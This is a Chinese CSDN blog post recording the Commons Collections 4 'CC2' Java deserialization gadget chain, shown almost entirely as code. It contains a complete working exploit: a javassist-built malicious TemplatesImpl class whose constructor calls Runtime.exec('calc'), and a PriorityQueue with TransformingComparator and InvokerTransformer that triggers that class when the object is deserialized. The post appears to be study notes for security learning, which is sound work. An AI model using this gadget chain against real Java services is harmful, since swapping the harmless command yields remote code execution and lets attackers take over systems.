Java反序列化 CC2利用链记录

最新推荐文章于 2024-05-18 11:09:56 发布
最新推荐文章于 2024-05-18 11:09:56 发布
阅读量103 收藏
点赞数
分类专栏: Java反序列化利用链 文章标签: java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LTianHang/article/details/128909322
版权

Java反序列化 CC2利用链记录

CC2利用链代码

import javassist.ClassPool;
import javassist.CtClass;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.InvokerTransformer;

import java.io.*;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.util.PriorityQueue;

public class CC2 {
    public static void main(String[] args) throws Exception {
        //构造恶意类TestTemplatesImpl并转换为字节码
        ClassPool classPool = ClassPool.getDefault();
        CtClass ctClass = classPool.getCtClass("CC2.TestTemplatesImpl");
        byte[] bytes = ctClass.toBytecode();

        //反射创建TemplatesImpl
        Class<?> aClass = Class.forName("com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl");
        Constructor<?> constructor = aClass.getDeclaredConstructor(new Class[]{});
        Object TemplatesImpl_instance = constructor.newInstance();
        //将恶意类的字节码设置给_bytecodes属性
        Field bytecodes = aClass.getDeclaredField("_bytecodes");
        bytecodes.setAccessible(true);
        bytecodes.set(TemplatesImpl_instance, new byte[][]{bytes});
        //设置属性_name为恶意类名
        Field name = aClass.getDeclaredField("_name");
        name.setAccessible(true);
        name.set(TemplatesImpl_instance, "TestTemplatesImpl");

        //构造利用链
        InvokerTransformer transformer = new InvokerTransformer("newTransformer", null, null);
        TransformingComparator transformer_comparator = new TransformingComparator(transformer);
        //触发漏洞
        PriorityQueue queue = new PriorityQueue(2);
        queue.add(1);
        queue.add(1);

        //设置comparator属性
        Field field = queue.getClass().getDeclaredField("comparator");
        field.setAccessible(true);
        field.set(queue, transformer_comparator);

        //设置queue属性
        field = queue.getClass().getDeclaredField("queue");
        field.setAccessible(true);
        //队列至少需要2个元素
        Object[] objects = new Object[]{TemplatesImpl_instance, TemplatesImpl_instance};
        field.set(queue, objects);

        //序列化 ---> 反序列化
        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(barr);
        oos.writeObject(queue);
        oos.close();
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
        Object object = ois.readObject();
    }
}

恶意类代码

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

public class TestTemplatesImpl extends AbstractTranslet {

    public TestTemplatesImpl() {
        super();
        try {
            Runtime.getRuntime().exec("calc");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

    }

    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

    }
}
keleth
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
java序列利用程序UI版Beta1.1.rar
07-20
java序列利用程序UI版Beta1.1.a
Java序列-CC2、4分析
The_W0rld的博客
07-22 1202
CC2中,使用的将不是前面的commons-collections依赖了,而是commons-collections4这个依赖,并且也采取了一下新的利用类PriorityQueue和TransformingComparator。通过PriorityQueue做为入口点,TransformingComparator作为跳板去触发利用链。...
Java安全研究——序列漏洞之CC2链
weixin_43889136的博客
05-10 1411
0x01
[Java安全入门]六.CC2+CC4+CC5+CC7
qq_34942239的博客
03-21 971
与前面几条cc不同的是,cc2的依赖是4.0版本,并且解决了高版本无法使用AnnotationInvocationHandler类的弊端。cc2使用javassist和PriorityQueue来构造链。
Java安全--CC2
qq_64201116的博客
12-19 548
我们要思考一下如何在InvokerTransformer newTransformer = new InvokerTransformer("newTransformer", new Class[]{}, new Object[]{});,在CC4中我们知道要传入至少两个对象。那我们这里是传入第一个对象还是第二个对象。既然可以两个都传,那我们能否第一个对象传入任意值,第二个对象再传入。在这之后便会像我们上面分析的一样,最终弹出计算器。其实就是之前都学过的几个类。
Java序列漏洞——CommonsCollections4.0版本—CC2、CC4
Thunderclap的博客
02-18 1511
因为这条利⽤链中的关键类org.apache.commons.collections4.comparators.TransformingComparator ,在commonscollections4.0以前是版本中是没有实现Serializable 接⼝的,⽆法在序列中使⽤。实际上是可用的,比如CC6的链,引入的时候因为⽼的Gadget中依赖的包名都是org.apache.commons.collections ,⽽新的包名已经变。其他的代码不需要改变,即可创建出新版本下的利用链。
9-java安全——关于构造CC2链的几个问题
网络安全
07-23 442
思考一下:CC2链的poc利用代码中为什么要向queue队列中添加至少2个元素?并且PriorityQueue队列中的queue属性被transient关键字修饰具有“不会序列”语义,在序列过程中为什么还能从流中读取queue的数据,流中的数据又从何而来? readObject方法是怎么从流中读取queue的数据 使用SerializationDumper工具解析对象序列的数据,Fields字段中并没有看到PriorityQueue的queue属性,说明queue确实没有参与序列.
java序列工具
11-21
java序列工具,覆盖jboss、weblogic、websphere。
java 序列利用工具marshalsec-0.0.3-SNAPSHOT-all
12-27
java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> []] 参数说明: -a:生成exploit下的所有payload(例如:hessian下的...
基于混合分析的Java序列利用链挖掘方法
05-14
基于混合分析的Java序列利用链挖掘方法 Java 程序开发 软件开发 参考文献 专业指导 计算机 课程资料 学习资料
Java序列实战.pdf
08-08
本议题将从那些经典案例入手,分析攻击方和防御方的对抗过程。会从fastjson与weblogic的两个经典漏洞,带大家傲游序列的世界。 序列入门 Fastjson Weblogic 序列防御
jar包增量更新分析
junlaiyan的专栏
05-16 246
借助jdeps分析出jar包的增量文件
java实现拼图小游戏
monkey108的博客
05-16 613
本文主要提供用java实现的拼图小游戏源代码。
命令执行漏洞(二)
XLbb的博客
05-15 898
POST方法,S2-045-bypass-2漏洞存在!,程序更改为S2-045-bypass-2漏洞测试模式, 响应码: 200。POST方法,S2-046-bypass漏洞存在!POST方法,S2-045-bypass漏洞存在!POST方法,S2-046-1漏洞存在!POST方法,S2-046-2漏洞存在!POST方法,S2-046-3漏洞存在!POST方法,S2-045-1漏洞存在!POST方法,S2-045-3漏洞存在!POST方法,S2-045-2漏洞存在!POST方法,S2-045-4漏洞存在!
c【语言】了解指针,爱上指针(1)
yzqy_的博客
05-16 898
在计算机中,数据是存储在内存中的,cpu从内存中读取数据,为了方便读取数据,内存又被划分为了一个个的内存单元,一个内存单元的大小就是一字节,一字节等于8bit位,我们给内存进行编号,这个编号就是地址,在c语言中给这个地址起了个名字。是的,亲爱的读者你肯定发现了,&a、p和pc输出的地址是一样的,但&a+1与p+1输出的地址是一样的00EFF940,一次都跳过了4字节,而pc+1输出的却是00EFF93D,一次只跳过一个字节。但是硬件与硬件之间是相互独立的,这该如何实现数据传输呢?”答案当然是否定的。
java数据结构与算法(验证二叉搜索树)
磐门的博客
05-17 244
节点返回空为ture,节点的值不在对应数据大小范围内返回false。将验证二叉搜索树计算同样可以转换为相同子问题,所以比较适合用递归。node为root的左节点时,max更新为root.val。node为root的右节点时,min更新为root.val。
Kubernetes 审计日志采集与分析最佳实践
观测云的博客
05-17 1020
​Kubernetes 在 1.7 版本中发布了审计(Audit)日志功能,通过审计日志,我们能够非常清晰的知道 K8S 集群到底发生了什么事情。
java导出excel动态加载多sheet多复杂表头
weixin_43931108的博客
05-14 245
java导出excel动态加载多sheet多复杂表头
解决 SpringBoot 的 Date、LocalDateTime 变成时间戳和数组的问题,创建自定义对象消息转换器
最新发布
shijialeya
05-18 371
解决 SpringBoot 的 Date、LocalDateTime 变成时间戳和数组的问题,创建自定义对象消息转换器进行数据格式
java序列利用
04-29
Java序列利用链是指黑客利用Java序列漏洞,通过构造恶意的序列数据,将恶意代码注入目标系统,从而实现攻击的手段。Java序列漏洞可能带来很大的风险,因为黑客可以利用它来实现各种攻击,比如代码执行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值